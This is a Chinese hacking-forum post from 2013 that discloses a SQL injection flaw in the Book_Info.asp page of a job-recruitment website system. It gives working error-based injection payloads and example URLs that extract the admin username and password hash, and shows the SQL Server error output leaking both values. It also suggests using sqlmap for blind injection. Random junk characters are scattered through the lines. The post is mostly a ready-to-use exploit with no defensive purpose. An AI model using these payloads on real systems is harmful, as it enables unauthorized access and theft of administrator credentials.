找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2077|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp 5 }& N9 d3 k0 D' l6 C% X; w) o
, [* }; ^+ m9 ^) y4 K' n& b( F# s
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
  J8 `7 m9 r, o
; X) y- }7 D% p/ Cexp:如下
) g5 X4 Q3 P( u. s查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ t9 Z+ v: V2 D2 w5 ^# s查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
* u% }8 c0 X' c( M
9 C) @' v" F: z% W7 Lhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)0 ^9 C- C# A/ A5 m) d0 ]

  O+ T, P/ Q2 J6 C7 m8 @& i4 l; `. GMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
9 ~' R! ~& i8 f7 C$ f$ V. w% ] / l; |9 _/ g' ^# S0 c
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。# d: H( b: C8 w* A* x; k6 C

6 M" S0 y* v; [: R7 c: G4 Y/Educate/Book_Info.asp,行 8
9 m7 b6 e( U( ]. y  n3 z$ `( c , d' g' h- l3 S% c+ I3 |
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)4 ^0 }1 }7 f' Z( h9 c  {% I

* @( T& X7 C2 `  e0 ^  R* @Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 Q2 C# }& U' f/ z" D& ^

7 V" g( p0 D, S- N" h将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。5 I* Q; Y$ F% ?
) m8 U5 L3 M+ o! Q* R
/Educate/Book_Info.asp,行 8
& b7 @/ q9 ]6 n; [# o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表